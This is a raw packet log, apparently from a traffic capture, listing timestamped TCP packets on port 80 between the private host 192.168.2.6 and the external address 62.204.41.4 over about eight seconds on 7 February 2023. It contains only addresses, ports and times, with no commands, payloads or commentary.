Feb 7, 2023 20:01:17.233407021 CET	49819	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.235249996 CET	49820	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.295593977 CET	80	49819	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.295810938 CET	49819	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.299042940 CET	80	49820	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.299340963 CET	49820	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.299894094 CET	49820	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.362515926 CET	80	49820	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.364586115 CET	80	49820	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.364841938 CET	49820	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.482371092 CET	49820	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.483870029 CET	49821	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.545236111 CET	80	49820	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.547075987 CET	80	49821	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.547317028 CET	49820	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.547400951 CET	49821	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.548024893 CET	49821	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.610235929 CET	80	49821	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.612590075 CET	80	49821	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.612680912 CET	49821	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.717545033 CET	49821	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.718506098 CET	49822	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.779963017 CET	80	49821	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.780036926 CET	80	49822	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.780132055 CET	49821	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.780306101 CET	49822	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.781117916 CET	49822	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.842745066 CET	80	49822	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.844888926 CET	80	49822	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.845917940 CET	49822	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.949585915 CET	49822	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.950499058 CET	49823	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.011565924 CET	80	49823	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.011643887 CET	80	49822	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.011897087 CET	49823	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.013653994 CET	49822	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.077794075 CET	49823	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.138756037 CET	80	49823	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.141810894 CET	80	49823	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.141994953 CET	49823	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.263894081 CET	49823	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.264651060 CET	49824	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.324126005 CET	80	49824	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.324261904 CET	49824	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.324702024 CET	80	49823	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.324846029 CET	49823	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.327899933 CET	49824	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.387484074 CET	80	49824	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.389848948 CET	80	49824	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.389969110 CET	49824	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.495862961 CET	49824	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.496577978 CET	49825	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.555418968 CET	80	49824	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.555733919 CET	49824	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.558321953 CET	80	49825	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.558511972 CET	49825	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.559731960 CET	49825	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.622153044 CET	80	49825	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.625855923 CET	80	49825	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.625998974 CET	49825	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.730897903 CET	49825	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.732048988 CET	49826	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.793046951 CET	80	49825	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.793205023 CET	49825	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.794426918 CET	80	49826	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.794605970 CET	49826	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.795279980 CET	49826	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.857810974 CET	80	49826	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.859751940 CET	80	49826	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:18.859895945 CET	49826	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.971184969 CET	49826	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:18.972475052 CET	49827	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.033252001 CET	80	49827	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.033590078 CET	49827	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.033830881 CET	80	49826	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.033931971 CET	49826	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.034168005 CET	49827	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.094630003 CET	80	49827	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.099330902 CET	80	49827	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.099543095 CET	49827	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.216332912 CET	49827	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.217984915 CET	49828	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.277112961 CET	80	49827	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.277283907 CET	49827	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.280755043 CET	80	49828	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.281060934 CET	49828	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.281462908 CET	49828	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.344012976 CET	80	49828	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.346347094 CET	80	49828	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.346504927 CET	49828	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.450792074 CET	49828	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.451510906 CET	49829	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.513159990 CET	80	49829	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.513298035 CET	49829	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.514062881 CET	49829	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.514229059 CET	80	49828	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.514333010 CET	49828	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.574568033 CET	80	49829	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.576844931 CET	80	49829	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.577004910 CET	49829	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.689372063 CET	49829	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.690080881 CET	49830	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.749975920 CET	80	49829	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.750128984 CET	49829	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.750361919 CET	80	49830	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.750519991 CET	49830	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.753947020 CET	49830	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.814471960 CET	80	49830	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.816864014 CET	80	49830	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.816989899 CET	49830	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.933579922 CET	49830	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.936146021 CET	49831	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.994175911 CET	80	49830	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.994333982 CET	49830	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.995836973 CET	80	49831	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:19.995953083 CET	49831	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:19.998059988 CET	49831	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.057732105 CET	80	49831	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.060909033 CET	80	49831	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.060976982 CET	49831	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.176212072 CET	49831	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.177074909 CET	49832	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.236000061 CET	80	49831	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.236119032 CET	49831	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.237637043 CET	80	49832	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.237780094 CET	49832	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.240758896 CET	49832	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.301160097 CET	80	49832	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.305460930 CET	80	49832	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.305605888 CET	49832	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.419162035 CET	49832	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.419987917 CET	49833	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.479845047 CET	80	49832	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.479953051 CET	49832	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.482484102 CET	80	49833	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.482615948 CET	49833	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.483012915 CET	49833	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.545548916 CET	80	49833	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.547585011 CET	80	49833	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.547792912 CET	49833	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.653589010 CET	49833	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.654484987 CET	49834	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.715337992 CET	80	49834	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.715590954 CET	49834	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.716373920 CET	80	49833	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.716500044 CET	49833	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.722457886 CET	49834	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.783031940 CET	80	49834	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.785341024 CET	80	49834	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.785486937 CET	49834	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.902936935 CET	49834	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.903762102 CET	49835	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.963705063 CET	80	49834	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.964056015 CET	49834	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.964107990 CET	80	49835	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:20.964391947 CET	49835	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:20.965850115 CET	49835	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.026201010 CET	80	49835	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.028662920 CET	80	49835	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.028908968 CET	49835	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.137447119 CET	49835	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.138140917 CET	49836	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.198043108 CET	80	49835	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.198827028 CET	49835	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.199667931 CET	80	49836	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.200031042 CET	49836	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.202537060 CET	49836	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.264616966 CET	80	49836	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.268675089 CET	80	49836	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.269979954 CET	49836	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.388817072 CET	49836	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.390433073 CET	49837	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.450000048 CET	80	49837	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.450345039 CET	80	49836	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.450607061 CET	49836	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.453902960 CET	49837	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.459259987 CET	49837	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.518819094 CET	80	49837	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.520694971 CET	80	49837	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.520946980 CET	49837	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.638294935 CET	49837	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.639128923 CET	49838	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.698498011 CET	80	49837	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.698632956 CET	49837	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.701215982 CET	80	49838	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.701457024 CET	49838	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.703798056 CET	49838	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.765548944 CET	80	49838	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.767724037 CET	80	49838	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.768639088 CET	49838	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.885093927 CET	49838	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.886539936 CET	49839	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.947088003 CET	80	49838	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.947276115 CET	49838	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.948179960 CET	80	49839	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:21.948394060 CET	49839	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:21.949196100 CET	49839	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.010775089 CET	80	49839	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.013309002 CET	80	49839	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.013467073 CET	49839	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.123639107 CET	49839	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.125847101 CET	49840	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.185388088 CET	80	49839	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.185489893 CET	49839	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.187232971 CET	80	49840	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.187377930 CET	49840	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.187784910 CET	49840	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.249314070 CET	80	49840	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.253473997 CET	80	49840	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.253689051 CET	49840	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.358606100 CET	49840	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.360620975 CET	49841	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.420384884 CET	80	49840	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.420516014 CET	49840	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.423126936 CET	80	49841	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.423317909 CET	49841	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.423645973 CET	49841	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.485944033 CET	80	49841	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.488256931 CET	80	49841	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.488450050 CET	49841	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.594734907 CET	49841	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.598030090 CET	49842	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.657434940 CET	80	49841	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.657553911 CET	49841	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.658715010 CET	80	49842	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.658844948 CET	49842	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.668684959 CET	49842	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.729969978 CET	80	49842	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.732220888 CET	80	49842	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.732407093 CET	49842	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.843416929 CET	49842	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.844198942 CET	49843	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.904266119 CET	80	49842	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.904365063 CET	49842	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.906817913 CET	80	49843	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.906968117 CET	49843	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.907370090 CET	49843	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:22.969804049 CET	80	49843	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.972731113 CET	80	49843	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:22.972868919 CET	49843	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.076297998 CET	49843	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.077461004 CET	49844	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.137890100 CET	80	49844	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.138192892 CET	49844	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.138868093 CET	80	49843	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.138925076 CET	49844	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.138946056 CET	49843	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.200340033 CET	80	49844	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.204888105 CET	80	49844	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.205054045 CET	49844	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.311310053 CET	49844	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.312262058 CET	49845	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.371886015 CET	80	49845	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.371947050 CET	80	49844	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.372081041 CET	49845	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.372136116 CET	49844	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.372817039 CET	49845	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.432214975 CET	80	49845	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.434403896 CET	80	49845	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.434528112 CET	49845	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.543870926 CET	49845	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.544806957 CET	49846	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.603461027 CET	80	49845	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.603634119 CET	49845	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.604572058 CET	80	49846	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.604703903 CET	49846	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.606580973 CET	49846	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.666389942 CET	80	49846	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.677861929 CET	80	49846	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.678046942 CET	49846	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.793133020 CET	49846	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.793971062 CET	49847	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.852905989 CET	80	49846	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.853096962 CET	49846	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.853250980 CET	80	49847	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.853394985 CET	49847	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.854307890 CET	49847	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:23.913652897 CET	80	49847	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.918473005 CET	80	49847	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:23.920105934 CET	49847	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.029871941 CET	49847	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.030735970 CET	49848	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.090490103 CET	80	49847	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.092411041 CET	49847	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.094248056 CET	80	49848	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.094480038 CET	49848	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.096024990 CET	49848	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.160110950 CET	80	49848	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.164890051 CET	80	49848	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.165009022 CET	49848	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.278892994 CET	49848	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.279822111 CET	49849	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.341515064 CET	80	49849	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.341548920 CET	80	49848	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.341731071 CET	49848	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.342135906 CET	49849	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.342359066 CET	49849	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.404269934 CET	80	49849	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.406771898 CET	80	49849	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.407015085 CET	49849	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.528486013 CET	49849	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.529767036 CET	49850	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.590326071 CET	80	49849	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.591272116 CET	80	49850	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.591430902 CET	49849	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.591491938 CET	49850	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.592098951 CET	49850	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.653553009 CET	80	49850	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.656240940 CET	80	49850	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.656326056 CET	49850	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.766738892 CET	49850	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.767777920 CET	49851	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.828409910 CET	80	49850	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.829302073 CET	49850	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.830223083 CET	80	49851	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.832393885 CET	49851	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.881496906 CET	49851	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:24.944123983 CET	80	49851	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.946882963 CET	80	49851	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:24.947093010 CET	49851	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.278781891 CET	49851	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.279628992 CET	49852	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.340475082 CET	80	49852	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:25.340723038 CET	49852	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.341314077 CET	80	49851	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:25.341418982 CET	49851	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.383304119 CET	49852	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.445421934 CET	80	49852	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:25.449835062 CET	80	49852	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:25.450084925 CET	49852	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.627831936 CET	49852	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.628648996 CET	49853	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.688879967 CET	80	49852	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:25.689110041 CET	49852	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.690130949 CET	80	49853	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:25.690326929 CET	49853	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.706872940 CET	49853	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:25.768372059 CET	80	49853	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:25.771174908 CET	80	49853	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:25.771383047 CET	49853	80	192.168.2.6	62.204.41.4
